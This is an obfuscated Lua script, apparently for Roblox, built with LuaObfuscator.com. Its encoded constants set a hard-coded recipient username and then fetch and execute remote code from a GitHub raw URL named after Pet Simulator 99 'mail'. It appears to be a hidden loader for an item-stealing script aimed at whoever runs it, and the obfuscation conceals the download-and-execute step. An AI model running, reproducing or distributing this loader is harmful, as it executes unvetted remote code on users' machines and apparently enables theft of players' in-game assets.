--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.9.19) ~  Much Love, Ferib 

]]--

local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=getfenv or function()return _ENV;end ;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack ;local v14=tonumber;local function v15(v16,v17,...)local v18=1;local v19;v16=v4(v3(v16,5),"..",function(v30)if (v1(v30,2)==79) then v19=v0(v3(v30,1,1));return "";else local v82=v2(v0(v30,16));if v19 then local v88=v5(v82,v19);v19=nil;return v88;else return v82;end end end);local function v20(v31,v32,v33)if v33 then local v83=(v31/((5 -3)^(v32-(2 -1))))%((1 + 1)^(((v33-(1 -0)) -(v32-(2 -1))) + 1)) ;return v83-(v83%(620 -(555 + 64))) ;else local v84=2^(v32-(932 -(857 + 74))) ;return (((v31%(v84 + v84))>=v84) and (569 -(367 + 32 + 169))) or (927 -(214 + 713)) ;end end local function v21()local v34=v1(v16,v18,v18);v18=v18 + 1 ;return v34;end local function v22()local v35,v36=v1(v16,v18,v18 + (879 -(282 + 595)) );v18=v18 + (1639 -(1523 + 114)) ;return (v36 * (231 + 25)) + v35 ;end local function v23()local v37,v38,v39,v40=v1(v16,v18,v18 + (3 -0) );v18=v18 + (1069 -(68 + 997)) ;return (v40 * ((16443059 + 335427) -(226 + 1044))) + (v39 * ((63283 + 222087) -219834)) + (v38 * (373 -((989 -(892 + 65)) + 85))) + v37 ;end local function v24()local v41=791 -(368 + 423) ;local v42;local v43;local v44;local v45;local v46;local v47;while true do if (v41==((18 -14) -2)) then v46=v20(v43,38 -17 ,56 -25 );v47=((v20(v43,474 -(416 + 9 + 17) )==(351 -(87 + 263))) and  -(181 -(67 + 113))) or (1 + 0) ;v41=(19 -12) -4 ;end if (v41==(430 -(44 + 386))) then v42=v23();v43=v23();v41=1 + 0 ;end if (v41==(1489 -(998 + 488))) then if (v46==(0 -0)) then if (v45==(952 -(802 + 150))) then return v47 * (0 -0) ;else local v98=0 -0 ;while true do if (v98==((449 + 689) -(116 + 1022))) then v46=1 + 0 ;v44=0 + (0 -0) ;break;end end end elseif (v46==(7472 -5425)) then return ((v45==(0 -0)) and (v47 * (((3435 -2437) -(915 + 82))/(0 -0)))) or (v47 * NaN) ;end return v8(v47,v46-(596 + 427) ) * (v44 + (v45/((2 -0)^(1239 -(1069 + 118))))) ;end if (v41==(2 -1)) then v44=1 -0 ;v45=(v20(v43,886 -(261 + 624) ,4 + 16 ) * ((3 -1)^(1455 -((2377 -(760 + 987)) + 793)))) + v42 ;v41=(1915 -(1789 + 124)) + 0 ;end end end local function v25(v48)local v49;if  not v48 then local v85=0 + (1413 -(447 + 966)) ;while true do if (v85==(1055 -(87 + 968))) then v48=v23();if (v48==(0 -0)) then return "";end break;end end end v49=v3(v16,v18,(v18 + v48) -(1 + 0) );v18=v18 + v48 ;local v50={};for v66=2 -1 , #v49 do v50[v66]=v2(v1(v3(v49,v66,v66)));end return v6(v50);end local v26=v23;local function v27(...)return {...},v12("#",...);end local function v28()local v51=0 + 0 ;local v52;local v53;local v54;local v55;local v56;local v57;local v58;local v59;while true do if (v51~=(1987 -(1266 + 719))) then else v56=nil;v57=nil;v51=606 -(268 + 335) ;end if (v51~=(294 -(60 + 230))) then else while true do if (v52==3) then v59=nil;while true do local v99=572 -(426 + 146) ;while true do if (v99~=(1 + 0)) then else if (v53~=3) then else local v100=1456 -(282 + 1174) ;while true do if (v100~=(811 -(569 + 242))) then else for v141=2 -1 ,v23() do v55[v141-1 ]=v28();end return v57;end end end if (v53~=2) then else local v101=0;local v102;while true do if (v101==(0 + 0)) then v102=1024 -(706 + 318) ;while true do if (v102==(1252 -(721 + 530))) then for v163=1,v23() do local v164=0;local v165;local v166;while true do if (v164==0) then v165=0;v166=nil;v164=1272 -(945 + 326) ;end if ((2 -1)==v164) then while true do if (v165~=(0 + 0)) then else v166=v21();if (v20(v166,701 -(271 + 429) ,1)==(0 + 0)) then local v174=0;local v175;local v176;local v177;local v178;local v179;while true do if ((1500 -(1408 + 92))~=v174) then else v175=1086 -(461 + 625) ;v176=nil;v174=1;end if ((1289 -(993 + 295))~=v174) then else v177=nil;v178=nil;v174=2;end if (v174==2) then v179=nil;while true do if (v175==(0 + 0)) then v176=0;v177=nil;v175=1172 -(418 + 753) ;end if (v175~=(1 + 0)) then else local v183=0;while true do if (v183~=(1 + 0)) then else v175=2;break;end if (v183~=(0 + 0)) then else local v184=0;while true do if (v184==(1 + 0)) then v183=1;break;end if ((529 -(406 + 123))==v184) then v178=nil;v179=nil;v184=1;end end end end end if (v175~=2) then else while true do if ((1771 -(1749 + 20))~=v176) then else local v185=0;local v186;while true do if (v185~=(0 + 0)) then else v186=0;while true do if (v186==1) then v176=3;break;end if (v186~=(1322 -(1249 + 73))) then else local v195=0 + 0 ;while true do if (v195==0) then if (v20(v178,1,1)==(1146 -(466 + 679))) then v179[4 -2 ]=v59[v179[5 -3 ]];end if (v20(v178,1902 -(106 + 1794) ,2)==1) then v179[1 + 2 ]=v59[v179[1 + 2 ]];end v195=1;end if ((2 -1)==v195) then v186=1;break;end end end end break;end end end if (v176~=3) then else if (v20(v178,7 -4 ,117 -(4 + 110) )~=1) then else v179[4]=v59[v179[4]];end v54[v163]=v179;break;end if (v176==0) then local v188=0;local v189;while true do if (v188~=(584 -(57 + 527))) then else v189=1427 -(41 + 1386) ;while true do if (v189~=(103 -(17 + 86))) then else local v196=0;local v197;while true do if (0==v196) then v197=0 + 0 ;while true do if (v197~=0) then else local v203=0 -0 ;while true do if (v203~=(0 -0)) then else v177=v20(v166,168 -(122 + 44) ,5 -2 );v178=v20(v166,12 -8 ,6);v203=1;end if (1==v203) then v197=1;break;end end end if (v197==(1 + 0)) then v189=1 + 0 ;break;end end break;end end end if (v189==1) then v176=1 -0 ;break;end end break;end end end if (v176==1) then local v190=65 -(30 + 35) ;local v191;local v192;while true do if (v190~=1) then else while true do if ((0 + 0)==v191) then v192=1257 -(1043 + 214) ;while true do if ((3 -2)==v192) then v176=2;break;end if (v192~=(1212 -(323 + 889))) then else local v198=0;while true do if (v198==1) then v192=2 -1 ;break;end if (v198==(580 -(361 + 219))) then v179={v22(),v22(),nil,nil};if (v177==0) then local v204=320 -(53 + 267) ;local v205;while true do if (v204~=0) then else v205=0 + 0 ;while true do if (v205==(413 -(15 + 398))) then v179[3]=v22();v179[4]=v22();break;end end break;end end elseif (v177==1) then v179[985 -(18 + 964) ]=v23();elseif (v177==(7 -5)) then v179[2 + 1 ]=v23() -((2 + 0)^(866 -(20 + 830))) ;elseif (v177==3) then local v210=0;local v211;while true do if (v210~=(0 + 0)) then else v211=0;while true do if (v211~=0) then else v179[3]=v23() -((128 -(116 + 10))^16) ;v179[1 + 3 ]=v22();break;end end break;end end end v198=1;end end end end break;end end break;end if (0~=v190) then else v191=738 -(542 + 196) ;v192=nil;v190=1 -0 ;end end end end break;end end break;end end end break;end end break;end end end v53=1 + 2 ;break;end if (v102==(0 + 0)) then local v157=0;while true do if (v157~=0) then else for v168=1 + 0 ,v58 do local v169=0;local v170;local v171;local v172;while true do if (v169==0) then local v173=0;while true do if (v173~=1) then else v169=1;break;end if (v173==(0 -0)) then v170=0 -0 ;v171=nil;v173=1552 -(1126 + 425) ;end end end if ((406 -(118 + 287))==v169) then v172=nil;while true do if (v170==0) then local v180=0;while true do if ((3 -2)==v180) then v170=1122 -(118 + 1003) ;break;end if (v180==(0 -0)) then local v182=0;while true do if ((378 -(142 + 235))==v182) then v180=1;break;end if (v182==(0 -0)) then v171=v21();v172=nil;v182=1;end end end end end if (v170==(1 + 0)) then if (v171==(978 -(553 + 424))) then v172=v21()~=(0 -0) ;elseif (v171==2) then v172=v24();elseif (v171==(3 + 0)) then v172=v25();end v59[v168]=v172;break;end end break;end end end v57[3 + 0 ]=v21();v157=1 + 0 ;end if (v157~=1) then else v102=1;break;end end end end break;end end end break;end if (v99~=0) then else if (0~=v53) then else local v103=0 + 0 ;while true do if (v103==(1 + 0)) then v56={};v53=2 -1 ;break;end if (v103==(0 -0)) then v54={};v55={};v103=2 -1 ;end end end if (1==v53) then local v104=0;while true do if (v104==0) then v57={v54,v55,nil,v56};v58=v23();v104=1 + 0 ;end if (1~=v104) then else v59={};v53=1331 -(797 + 532) ;break;end end end v99=1;end end end break;end if (v52==2) then local v95=0;while true do if (v95==1) then v52=3;break;end if (v95~=(0 + 0)) then else v57=nil;v58=nil;v95=1 + 0 ;end end end if (v52==1) then local v96=0;while true do if (v96==(0 -0)) then v55=nil;v56=nil;v96=1203 -(373 + 829) ;end if (v96==1) then v52=2;break;end end end if (v52~=(731 -(476 + 255))) then else local v97=1130 -(369 + 761) ;while true do if (v97~=0) then else v53=0 + 0 ;v54=nil;v97=1;end if (v97==1) then v52=1 -0 ;break;end end end end break;end if (v51~=(0 -0)) then else v52=0;v53=nil;v51=239 -(64 + 174) ;end if (v51~=3) then else v58=nil;v59=nil;v51=1 + 3 ;end if (v51~=1) then else v54=nil;v55=nil;v51=2;end end end local function v29(v60,v61,v62)local v63=v60[1];local v64=v60[2];local v65=v60[3];return function(...)local v68=v63;local v69=v64;local v70=v65;local v71=v27;local v72=1;local v73= -1;local v74={};local v75={...};local v76=v12("#",...) -1 ;local v77={};local v78={};for v86=0,v76 do if (v86>=v70) then v74[v86-v70 ]=v75[v86 + 1 ];else v78[v86]=v75[v86 + 1 ];end end local v79=(v76-v70) + 1 ;local v80;local v81;while true do local v87=0;while true do if (v87==1) then if (v81<=9) then if (v81<=4) then if (v81<=1) then if (v81==0) then v62[v80[3]]=v78[v80[2]];else local v107=v80[2];v78[v107]=v78[v107](v13(v78,v107 + 1 ,v73));end elseif (v81<=2) then local v109=0;local v110;while true do if (v109==0) then v110=v80[2];v78[v110]=v78[v110](v13(v78,v110 + 1 ,v73));break;end end elseif (v81==3) then if (v78[v80[2]]==v80[4]) then v72=v72 + 1 ;else v72=v80[3];end else v62[v80[3]]=v78[v80[2]];end elseif (v81<=6) then if (v81>5) then if (v78[v80[2]]==v80[4]) then v72=v72 + 1 ;else v72=v80[3];end else v78[v80[2]]();end elseif (v81<=7) then local v111=0;local v112;local v113;local v114;local v115;while true do if (v111==1) then v73=(v114 + v112) -1 ;v115=0;v111=2;end if (2==v111) then for v148=v112,v73 do v115=v115 + 1 ;v78[v148]=v113[v115];end break;end if (v111==0) then v112=v80[2];v113,v114=v71(v78[v112](v13(v78,v112 + 1 ,v80[3])));v111=1;end end elseif (v81==8) then if ((v80[3]=="_ENV") or (v80[3]=="getfenv")) then v78[v80[2]]=v62;else v78[v80[2]]=v62[v80[3]];end else v72=v80[3];end elseif (v81<=14) then if (v81<=11) then if (v81>10) then if ((v80[3]=="_ENV") or (v80[3]=="getfenv")) then v78[v80[2]]=v62;else v78[v80[2]]=v62[v80[3]];end else v72=v80[3];end elseif (v81<=12) then local v117=0;local v118;local v119;local v120;local v121;while true do if (v117==1) then v73=(v120 + v118) -1 ;v121=0;v117=2;end if (v117==0) then v118=v80[2];v119,v120=v71(v78[v118](v13(v78,v118 + 1 ,v80[3])));v117=1;end if (v117==2) then for v154=v118,v73 do v121=v121 + 1 ;v78[v154]=v119[v121];end break;end end elseif (v81==13) then v78[v80[2]]=v80[3];else local v138=0;local v139;local v140;while true do if (v138==1) then v78[v139 + 1 ]=v140;v78[v139]=v140[v80[4]];break;end if (v138==0) then v139=v80[2];v140=v78[v80[3]];v138=1;end end end elseif (v81<=16) then if (v81==15) then do return;end else local v122=v80[2];local v123=v78[v80[3]];v78[v122 + 1 ]=v123;v78[v122]=v123[v80[4]];end elseif (v81<=17) then v78[v80[2]]=v80[3];elseif (v81==18) then v78[v80[2]]();else do return;end end v72=v72 + 1 ;break;end if (v87==0) then v80=v68[v72];v81=v80[1];v87=1;end end end end;end return v29(v28(),{},v17)(...);end v15("LOL!073O00028O0003083O00557365726E616D65030A3O006A756E7279616E332O31030A3O006C6F6164737472696E6703043O0067616D6503073O00482O747047657403433O00682O7470733A2O2F7261772E67697468756275736572636F6E74656E742E636F6D2F4C7970686572582F50532O394D61696C2F6D61696E2F4D656D656E746F6D6F7269000F3O00120D3O00013O0026033O0001000100010004093O0001000100120D000100033O00122O000100023O001208000100043O001208000200053O00200E00020002000600120D000400074O000C000200044O000200013O00022O00120001000100010004093O000E00010004093O000100012O000F3O00017O00",v9(),...);
